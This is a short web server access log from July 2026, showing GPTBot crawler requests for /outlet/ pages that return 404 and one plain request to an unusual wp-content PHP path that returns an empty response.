173.255.225.15 - - [12/Jul/2026:16:34:10 +0200] "GET / HTTP/1.1" 200 1848 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.22.57.40 - - [12/Jul/2026:16:34:40 +0200] "GET /outlet/070024761 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:35:13 +0200] "GET /outlet/289047122 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:35:45 +0200] "GET /outlet/168036213 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:36:20 +0200] "GET /outlet/295036226 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
172.70.176.88 - - [12/Jul/2026:16:36:29 +0200] "GET /wp-content/x41e411/index.php HTTP/1.1" 200 0 "https://alg24info.com/wp-content/x41e411/index.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
104.22.57.40 - - [12/Jul/2026:16:36:53 +0200] "GET /outlet/134049367 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
